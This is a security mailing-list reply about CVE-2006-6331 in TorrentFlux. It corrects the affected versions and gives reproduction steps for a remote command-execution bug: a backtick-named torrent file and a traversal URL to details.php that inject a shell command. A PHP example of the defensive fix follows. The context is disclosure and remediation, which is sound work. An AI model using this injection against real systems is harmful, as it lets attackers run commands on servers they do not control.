On 12/6/06, Cameron Dale <[EMAIL PROTECTED]> wrote:
> ======================================================
> Name: CVE-2006-6331
> Status: Candidate
> URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6331
> Reference:
> CONFIRM:http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=%23400582
> Reference:
> MISC:http://bugs.debian.org/cgi-bin/bugreport.cgi/11_missed_security_fixes.dpatch?bug=400582;msg=71;att=1
>
> metaInfo.php in TorrentFlux 2.2, when $cfg["enable_file_priority"] is
> false, allows remote attackers to execute arbitrary commands via shell
> metacharacters (backticks) in the torrent parameter to details.php.
This problem, as described, is not present in 2.2, only in 2.1. Also,
the dpatch attached is a little misleading as it contains changes
that fix the 2 previous problems (6329 and 6330) as well as this one
(6331).
There is, however, a similar problem to this in 2.2 that Stefan
described as a "local privilege escalation". It uses the torrent
parameter and a local user's ability to create a file containing
backticks, to then execute arbitrary commands as the webserver user
(www-data). I don't think it applies to remote users though, only
local. You may want to request another CVE for this one, as it is a
separate problem from 6331 and does affect version 2.2.
Actually, on further investigation, I was wrong about this one, as it
is a remote command execution bug in 2.2 as well, and I recommend you
report it as such. I had thought that TorrentFlux's cleaning of the
downloaded torrent files would make this local only, but I now see
that a torrent file that includes files that have backticks will work
(sorry Stefan, I misread your previous email about this). Here is how
to properly take advantage of this in Torrentflux 2.2 (or 2.1):
mkdir -p '`touch /tmp/'
echo "Test file" > '`touch /tmp/hello`.torrent'
btmakemetafile --target test.torrent http://localhost:6969 \`touch\ /
Now upload test.torrent to TorrentFlux and start it downloading (it
won't download anything, but that doesn't matter as the files are
created when the torrent starts).
Now go to (replace username with your TorrentFlux user name):
http://hostname/torrentflux/details.php?torrent=../username/`touch /tmp/hello`.torrent
It should say only "btshowmetainfo 20030621 - decode BitTorrent
metainfo files" and the /tmp/hello file should be created as the web
server user (www-data).
Cameron
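The root cause discussed above is that metaInfo.php builds a shell command string from the user-controlled torrent parameter, so backticks in a file name are interpreted by the shell. The following is an added illustration of the defensive pattern that fixes this class of bug, not TorrentFlux's own code or the Debian patch; the function names, the directory layout and the sample names are assumptions made for the example.

```php
<?php
// Added example (not TorrentFlux code). Two controls are combined:
//  1. an allowlist on the torrent parameter, which rejects directory
//     traversal ("../username/...") and shell metacharacters outright;
//  2. escapeshellarg() on the final path, so that even a file name the
//     allowlist would let through is passed to sh as a single literal
//     argument rather than being re-parsed for `...` or $(...).

// Constructed stand-in for the per-user torrent directory (assumption).
define('TORRENT_DIR', '/var/torrentflux/username/');

/**
 * Return the validated torrent path, or null if the parameter is unsafe.
 * Only a bare file name of the form <name>.torrent is accepted; no '/',
 * no whitespace, no quoting or substitution characters.
 */
function validated_torrent_path(string $param): ?string
{
    if (!preg_match('/^[A-Za-z0-9][A-Za-z0-9._-]*\.torrent$/', $param)) {
        return null;
    }
    return TORRENT_DIR . $param;
}

/**
 * Build the btshowmetainfo command line for a validated path.
 * escapeshellarg() single-quotes the argument, so the shell never sees
 * an unquoted backtick even if the allowlist were later relaxed.
 */
function btshowmetainfo_command(string $path): string
{
    return 'btshowmetainfo ' . escapeshellarg($path);
}

// Constructed sample inputs: a benign name and the backtick name from the
// report above. The second is rejected before any shell is involved.
$samples = ['test.torrent', '../username/`touch /tmp/hello`.torrent'];
foreach ($samples as $name) {
    $path = validated_torrent_path($name);
    if ($path === null) {
        echo "rejected: $name\n";
        continue;
    }
    // A real handler would also check is_file($path) and run the command
    // with exec(); here the built string is only shown.
    echo "would run: " . btshowmetainfo_command($path) . "\n";
}
```

Note that escapeshellarg() protects the argument only when the whole command string is still passed through a shell; keeping the allowlist in front of it is what stops the path traversal the report relies on.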